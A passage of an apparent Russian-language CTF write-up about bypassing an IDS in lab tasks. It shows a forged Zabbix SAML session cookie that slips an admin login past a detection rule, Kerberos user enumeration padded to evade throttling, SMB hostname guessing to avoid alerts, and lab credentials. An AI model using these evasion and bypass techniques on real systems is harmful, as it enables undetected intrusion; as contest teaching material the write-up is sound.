\u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u0439. \u0418\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0437\u0430\u0434\u0443\u043c\u044b\u0432\u0430\u043b\u0441\u044f \u043e\u0431\u0445\u043e\u0434 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0433\u043e \u043f\u0440\u0430\u0432\u0438\u043b\u0430. \u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043f\u043e\u0441\u043b\u0435 \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0442\u0430\u043a\u043e\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u043a\u0443\u043a\u0438 zbx_session:<\/p>\n<p><code>{\"saml_data\": {\"username_attribute\": \"Admin\"}, \"sessionid\": \"fdbd6cbbbb21133df4376e4c4af74920\", \"sign\": \"DChdvVPpnlFA0JjTUCWiGZFZefz9ML2yqNZno5ORDPx2Chhb7HNUeuV4O7d0af9OgyoON68ObgNZH30hgWW76Q==\"}<\/code><\/p>\n<p>\u0424\u0440\u0430\u0433\u043c\u0435\u043d\u0442\u044b base64 \u0438\u0437 \u043f\u0440\u0430\u0432\u0438\u043b\u0430 IDS \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c:<\/p>\n<ul>\n<li>\n<p><code>\"username_attribute\":<\/code><\/p>\n<\/li>\n<li>\n<p><code>\"saml_data<\/code><\/p>\n<\/li>\n<\/ul>\n<p>\u041f\u043e\u0441\u0442\u0430\u0432\u0438\u0432 \u043f\u0440\u043e\u0431\u0435\u043b \u043f\u0435\u0440\u0435\u0434 \u0434\u0432\u043e\u0435\u0442\u043e\u0447\u0438\u0435\u043c \u0432 \u043a\u043b\u044e\u0447\u0435 username_attribute, \u043c\u044b \u043d\u0435 \u043d\u0430\u0440\u0443\u0448\u0438\u043c \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 json, \u043d\u043e \u043e\u0431\u043e\u0439\u0434\u0435\u043c IDS-\u043f\u0440\u0430\u0432\u0438\u043b\u043e \u0432\u044b\u0448\u0435. \u042d\u0442\u043e \u0442\u043e\u0436\u0435 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044e \u0444\u043b\u0430\u0433\u0430 (\u043f\u043e\u043b\u044f sessionid \u0438 sign \u043d\u0435\u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u044b):<\/p>\n<p><code>Cookie: zbx_session= eyJzYW1sX2RhdGEiIDp7InVzZXJuYW1lX2F0dHJpYnV0ZSIgOiJBZG1pbiJ9LCAic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9<\/code> <\/p>\n<p>\u0424\u043b\u0430\u0433 \u0441\u043a\u0440\u044b\u0432\u0430\u043b\u0441\u044f \u0432 \u0441\u043f\u0438\u0441\u043a\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 Zabbix.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/dc4\/fa8\/930\/dc4fa89301548a2f930399b53d8ea821.png\" width=\"828\" height=\"360\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/dc4\/fa8\/930\/dc4fa89301548a2f930399b53d8ea821.png\"\/><figcaption><\/figcaption><\/figure>\n<h3>\u0417\u0430\u0434\u0430\u043d\u0438\u0435 3: EVIL.CORP (30 \u043e\u0447\u043a\u043e\u0432)<\/h3>\n<figure class=\"\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/1ec\/458\/500\/1ec4585000eb77821734df1b6652d00b.png\" width=\"447\" height=\"172\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/1ec\/458\/500\/1ec4585000eb77821734df1b6652d00b.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0412 \u0442\u0435\u043a\u0441\u0442\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u0433\u043e\u0432\u043e\u0440\u0438\u043b\u043e\u0441\u044c \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0443 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u0435\u0440\u0435\u0431\u0440\u0430\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435 EVIL.CORP \u043f\u043e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0443 Kerberos. \u0418\u043c\u0435\u043d\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u043c\u0435\u044e\u0442 \u0441\u0442\u0440\u043e\u0433\u043e \u043e\u0433\u043e\u0432\u043e\u0440\u0435\u043d\u043d\u044b\u0439 \u0444\u043e\u0440\u043c\u0430\u0442: user[1..16]_[a..z0..9]. \u041a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u0431\u044b, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0439\u0442\u0438 \u043d\u0435 \u0442\u0430\u043a? \u041e\u0434\u043d\u0430\u043a\u043e \u0432 \u0437\u0430\u0434\u0430\u043d\u0438\u0438 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043b\u0430\u0441\u044c \u043d\u0435\u043a\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0437\u0430\u0449\u0438\u0442\u044b, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u043d\u0430 ML\u2026<\/p>\n<p>\u0414\u043b\u044f \u043f\u0435\u0440\u0435\u0431\u043e\u0440\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043e\u0434\u043e\u0439\u0434\u0435\u0442 \u043b\u044e\u0431\u043e\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, <a href=\"https:\/\/github.com\/ropnop\/kerbrute\">kerbrute<\/a>). \u0413\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u043c \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u043f\u0435\u0440\u0435\u0431\u043e\u0440:<\/p>\n<p> <code>kerbrute -dc-ip 10.0.0.145 -domain evil.corp -threads 2 -users usernames.txt;<\/code><\/p>\n<p>\u041f\u043e\u0447\u0442\u0438 \u0441\u0440\u0430\u0437\u0443 \u043c\u044b \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u0438\u044f \u043e\u0442 IDS (\u043f\u043e \u043e\u0434\u043d\u043e\u043c\u0443 \u043d\u0430 \u043a\u0430\u0436\u0434\u044b\u0439 \u0442\u0440\u0435\u0434). \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 \u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0442\u0440\u0435\u0434\u043e\u0432, \u0440\u0430\u0432\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043d\u043e \u0443\u0441\u043f\u0435\u0445\u0430 \u044d\u0442\u043e, \u043a\u043e\u043d\u0435\u0447\u043d\u043e, \u043d\u0435 \u043f\u0440\u0438\u043d\u0435\u0441\u043b\u043e:<\/p>\n<p><code>ANOMALY [PTsecurity] Your traffic looks like kerberos user enumeration (Too many usernames). Blocked for 300 seconds<\/code><\/p>\n<p>\u041c\u044b \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u0430, \u043d\u043e \u0438 \u0431\u043b\u043e\u043a \u043d\u0430 \u043f\u044f\u0442\u044c \u043c\u0438\u043d\u0443\u0442. \u0415\u0441\u0442\u044c \u0432\u0440\u0435\u043c\u044f \u043f\u043e\u0434\u0443\u043c\u0430\u0442\u044c.<\/p>\n<p>\u0410\u0431\u0431\u0440\u0435\u0432\u0438\u0430\u0442\u0443\u0440\u0430 ML \u0432 \u0442\u0435\u043a\u0441\u0442\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u043d\u0443\u0436\u043d\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u0448\u0435\u043d\u0438\u044f. \u0412\u043c\u0435\u0441\u0442\u043e ML \u2014 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0443\u0432\u0435\u043b\u0438\u0447\u0438\u0432\u0430\u0435\u0442 \u0441\u0447\u0435\u0442\u0447\u0438\u043a, \u0435\u0441\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0432\u0445\u043e\u0434\u0430 \u043f\u043e\u0434 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438, \u0438 \u0443\u043c\u0435\u043d\u044c\u0448\u0430\u0435\u0442 \u0441\u0447\u0435\u0442\u0447\u0438\u043a, \u0435\u0441\u043b\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u0435\u0442\u0441\u044f. \u0421\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442, \u0435\u0441\u043b\u0438 \u0441\u0447\u0435\u0442\u0447\u0438\u043a \u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442 \u043f\u043e\u0440\u043e\u0433\u043e\u0432\u043e\u0433\u043e \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f. \u0414\u043b\u044f \u043e\u0431\u0445\u043e\u0434\u0430 \u044d\u0442\u043e\u0433\u043e \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0430 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u043a\u0430\u0436\u0434\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0441\u043f\u0438\u0441\u043e\u043a \u0442\u0440\u0438 \u0440\u0430\u0437\u0430 \u043f\u043e\u0434\u0440\u044f\u0434. \u0422\u043e\u0433\u0434\u0430 kerbrute \u0437\u0430\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u0434\u0432\u0443\u043c\u044f \u043f\u043e\u0442\u043e\u043a\u0430\u043c\u0438:<\/p>\n<pre><code>date; \/home\/user\/.local\/bin\/kerbrute -dc-ip 10.0.0.145 -domain evil.corp -threads 2 -users usernames.txt; date Fri Apr 29 17:13:47 MSK 2022 Impacket v0.9.24.dev1+20210630.100536.73b9466c - Copyright 2021 SecureAuth Corporation [*] Valid user => user1_d2 [*] Valid user => user2_de ... [*] Valid user => user14_51 [*] Valid user => user15_1e [*] Valid user => user16_33 [*] No passwords were discovered :'( Fri Apr 29 17:20:27 MSK 2022<\/code><\/pre>\n<p>\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0444\u043b\u0430\u0433 d2de3e88e1fa800fbed902a999511e33 \u0437\u0430 6 \u043c\u0438\u043d\u0443\u0442 40 \u0441\u0435\u043a\u0443\u043d\u0434.<\/p>\n<h3>\u0417\u0430\u0434\u0430\u043d\u0438\u0435 4: WIN-FS98F6 (35 \u043e\u0447\u043a\u043e\u0432)<\/h3>\n<figure class=\"\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/ade\/69a\/f5a\/ade69af5a6682eb512882c29138592b9.png\" width=\"447\" height=\"100\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/ade\/69a\/f5a\/ade69af5a6682eb512882c29138592b9.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u041f\u0440\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0438 \u044d\u0442\u043e\u0433\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044f, \u043f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0432 \u043f\u043e\u0440\u0442\u044b \u0443\u0437\u043b\u0430 10.0.0.21, \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u043b \u043b\u0438\u0448\u044c \u043f\u043e\u0440\u0442 445. \u0417\u0430\u0439\u0434\u044f \u043f\u043e SMB \u043d\u0430 \u0443\u0437\u0435\u043b \u043b\u044e\u0431\u044b\u043c \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u043c, \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u043d\u0430\u0445\u043e\u0434\u0438\u043b \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u0434\u043d\u0443 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0443\u044e \u0430\u043d\u043e\u043d\u0438\u043c\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0448\u0430\u0440\u0443:<\/p>\n<pre><code>user@ubuntu1:~$ smbclient.py 10.0.0.21 Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation \u00a0 Type help for list of commands # shares flag users IPC$ # use flag [-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) # use users # ls -rw-rw-rw-\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 105\u00a0 Sat May\u00a0 7 18:02:48 2022 users.txt # cat users.txt I can even publish my credentials here. Our IDS is so good, no one won't get through sammy:samm3P@ssw0rd<\/code><\/pre>\n<p>\u0417\u043d\u0430\u043d\u0438\u0435 The Lord of the Rings \u0432 \u044d\u0442\u043e\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0438 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043b\u0438\u0448\u044c \u0442\u0435\u043c, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0437\u043e\u0432\u0443\u0442 sammy. \u041f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u044f\u0432 \u043f\u043e\u043f\u044b\u0442\u043a\u0443 \u043b\u043e\u0433\u0438\u043d\u0430 \u043f\u043e\u0434 \u044d\u0442\u0438\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c, \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u043f\u043e\u043b\u0443\u0447\u0430\u043b \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u0438\u0435 (\u0432 \u0444\u0430\u0439\u043b\u0435 users.txt \u0432\u0435\u0434\u044c \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043e, \u0447\u0442\u043e IDS \u0445\u043e\u0440\u043e\u0448\u0430\u044f), \u043f\u0440\u0438\u0447\u0435\u043c smbclient \u0438\u0437 \u043d\u0430\u0431\u043e\u0440\u0430 samba-tool \u0438 smbclient.py \u0438\u0437 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 Impacket \u0432\u044b\u0434\u0430\u0432\u0430\u043b\u0438 \u0440\u0430\u0437\u043d\u044b\u0435 \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u0438\u044f:<\/p>\n<pre><code>smbclient.py sammy:samm3P@ssw0rd@10.0.0.21 ATTACK [PTsecurity] User sammy login from unknown place  smbclient \/\/10.0.0.21\/flag -U Sammy ATTACK [PTsecurity] User sammy login from wrong place (0%)<\/code><\/pre>\n<p>\u041a\u0430\u043a \u043f\u0440\u0430\u0432\u0438\u043b\u043e, \u0442\u043e\u0442 \u043f\u0430\u043a\u0435\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 IDS \u0438 \u043f\u043e\u0441\u043b\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043f\u0440\u0438\u0441\u044b\u043b\u0430\u0435\u0442 \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u0438\u0435, \u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u0440\u0438\u0447\u0438\u043d\u043e\u0439 \u044d\u0442\u043e\u0433\u043e \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u0438\u044f. \u0417\u0430\u043f\u0438\u0441\u0430\u0432 \u0441\u0432\u043e\u0439 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0442\u0440\u0430\u0444\u0438\u043a \u043f\u0435\u0440\u0435\u0434 \u0430\u043b\u0435\u0440\u0442\u043e\u043c, \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u043b, \u0447\u0442\u043e IDS \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u043f\u0430\u043a\u0435\u0442 NTLMSSP \u0441 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435\u043c NTLMSSP_AUTH.<\/p>\n<figure class=\"full-width\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d1a\/f2f\/38c\/d1af2f38c25f968d1379c449f92abbd1.png\" width=\"1018\" height=\"311\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/d1a\/f2f\/38c\/d1af2f38c25f968d1379c449f92abbd1.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0421\u0440\u0430\u0432\u043d\u0438\u0432 \u044d\u0442\u0438 \u043f\u0430\u043a\u0435\u0442\u044b, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0435 \u043e\u0442 \u0434\u0432\u0443\u0445 \u0443\u043f\u043e\u043c\u044f\u043d\u0443\u0442\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u043e\u0434\u0438\u043d \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 (smbclient.py) \u043d\u0435 \u0437\u0430\u0434\u0430\u0432\u0430\u043b \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043f\u043e\u043b\u044f Host name \u0432 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0438 NTLMSSP_AUTH, \u0430 \u0434\u0440\u0443\u0433\u043e\u0439 \u0437\u0430\u0434\u0430\u0432\u0430\u043b. \u0423\u0437\u0435\u043b \u0430\u0432\u0442\u043e\u0440\u0430 \u043d\u0430 \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u0435 \u043d\u0438\u0436\u0435, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043d\u0430\u0437\u044b\u0432\u0430\u043b\u0441\u044f UBUNTU1.<\/p>\n<figure class=\"\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/37c\/36e\/57e\/37c36e57e9f8a27909358edbe2f40922.png\" width=\"410\" height=\"226\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/37c\/36e\/57e\/37c36e57e9f8a27909358edbe2f40922.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0414\u0435\u043b\u043e \u043e\u0441\u0442\u0430\u0432\u0430\u043b\u043e\u0441\u044c \u0437\u0430 \u043c\u0430\u043b\u044b\u043c \u2014 \u043f\u0435\u0440\u0435\u0431\u0440\u0430\u0442\u044c \u0438\u043c\u044f \u0443\u0437\u043b\u0430, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 \u043f\u0435\u0440\u0432\u043e\u0439 \u0431\u0443\u043a\u0432\u044b, \u0438 \u043d\u0430\u0439\u0442\u0438 \u0432\u0435\u0440\u043d\u043e\u0435. \u041f\u0440\u043e\u0446\u0435\u043d\u0442\u044b \u0432 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0438 \u0430\u043b\u0435\u0440\u0442\u0430 \u043f\u043e\u043c\u043e\u0433\u0430\u043b\u0438 \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0443 \u043f\u043e\u043d\u044f\u0442\u044c, \u0447\u0442\u043e \u043e\u043d \u043f\u043e\u0434\u043e\u0431\u0440\u0430\u043b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0441\u0438\u043c\u0432\u043e\u043b \u0432\u0435\u0440\u043d\u043e. \u041d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0439 \u0443\u0437\u0435\u043b \u043d\u0430\u0437\u044b\u0432\u0430\u043b\u0441\u044f SAMDESKTOP. <\/p>\n<pre><code>user@ubuntu1:~$ smbclient \/\/10.0.0.21\/flag -U sammy smb: \\> ls \u00a0 flag.txt\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 N\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 29\u00a0 Wed May 11 23:38:27 2022 smb: \\> get flag.txt getting file \\flag.txt of size 29 as flag.txt (0.3 KiloBytes\/sec)  smb: \\> exit user@ubuntu1:~$ cat flag.txt flag{S4mm3_where_1s_Fr0d0?}<\/code><\/pre>\n<p>\u042d\u0442\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u043f\u043e\u0445\u043e\u0436\u0435 \u043d\u0430 \u043e\u0434\u0438\u043d \u0438\u0437 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u043a\u043e\u0433\u0434\u0430 \u043e\u043d\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0435 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u0441 \u043d\u0435\u043e\u0431\u044b\u0447\u043d\u044b\u0445 \u0443\u0437\u043b\u043e\u0432.<\/p>\n<h3>\u0417\u0430\u0434\u0430\u043d\u0438\u0435 5: ABC (45 \u043e\u0447\u043a\u043e\u0432)<\/h3>\n<figure class=\"\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/56e\/143\/62d\/56e14362db10564e9323c1eec38400fb.png\" width=\"446\" height=\"98\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/56e\/143\/62d\/56e14362db10564e9323c1eec38400fb.png\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0427\u0435\u043c \u0441\u043b\u043e\u0436\u043d\u0435\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u0435, \u0442\u0435\u043c \u0431\u043e\u043b\u044c\u0448\u0435 \u0435\u0433\u043e \u0441\u0442\u043e\u0438\u043c\u043e\u0441\u0442\u044c, \u0438 \u043d\u0430\u043e\u0431\u043e\u0440\u043e\u0442. \u042d\u0442\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0438\u043b \u043b\u0438\u0448\u044c \u043e\u0434\u0438\u043d \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u2014 psih1337, \u0442\u0435\u043c \u0441\u0430\u043c\u044b\u043c \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432 \u0441\u0435\u0431\u0435 \u043f\u0435\u0440\u0432\u043e\u0435 \u043c\u0435\u0441\u0442\u043e.<\/p>\n<p>\u0423\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0430\u043c \u0431\u044b\u043b\u0438 \u0434\u0430\u043d\u044b \u0434\u043e\u043c\u0435\u043d ABC.XYZ \u0438 \u0443\u0437\u0435\u043b \u0441 \u0438\u043c\u0435\u043d\u0435\u043c DC. \u0414\u0430\u043d\u043d\u044b\u0435 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 sammy:samm3P@ssw0rd \u0432\u0435\u043b\u0435\u043d\u043e \u0431\u044b\u043b\u043e \u0432\u0437\u044f\u0442\u044c \u0438\u0437 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0433\u043e \u0437\u0430\u0434\u0430\u043d\u0438\u044f. \u041d\u0430 \u0443\u0437\u043b\u0435 \u0431\u044b\u043b\u043e \u0432\u0441\u0435\u0433\u043e \u0434\u0432\u0430 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0445 \u043f\u043e\u0440\u0442\u0430: 88 \u0438 445. \u042d\u0442\u043e\u0442 \u043d\u0430\u0431\u043e\u0440 \u043f\u043e\u0440\u0442\u043e\u0432 \u043a\u0430\u043a \u0431\u044b \u043d\u0430\u043c\u0435\u043a\u0430\u043b \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0443 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0431\u044b\u043b\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c Kerberos-\u0431\u0438\u043b\u0435\u0442 \u0438 \u0441 \u0435\u0433\u043e \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u043f\u043e SMB \u0432 \u0448\u0430\u0440\u0443. \u041c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 NTLM \u0431\u044b\u043b \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d \u0432 \u044d\u0442\u043e\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0438.<\/p>\n<p><code>smbclient.py -k -dc-ip 10.0.0.233 ABC.XYZ\/sammy:samm3P@ssw0rd@DC<\/code> <\/p>\n<p>\u041f\u043e\u0441\u043b\u0435 \u0442\u0430\u043a\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a \u043f\u043e\u043b\u0443\u0447\u0430\u043b \u043e\u043f\u043e\u0432\u0435\u0449\u0435\u043d\u0438\u0435:<\/p>\n<p><code>ATTACK [PTsecurity] Block TGS request with probably malicious TGT ticket<\/code> <\/p>\n<p>IDS \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0430 TGS-\u0437\u0430\u043f\u0440\u043e\u0441 \u0434\u043b\u044f \u0441\u0435\u0440\u0432\u0438\u0441\u0430 cifs\/DC, \u0442\u0430\u043a \u043a\u0430\u043a \u0432 \u043d\u0435\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 TGT-\u0431\u0438\u043b\u0435\u0442. 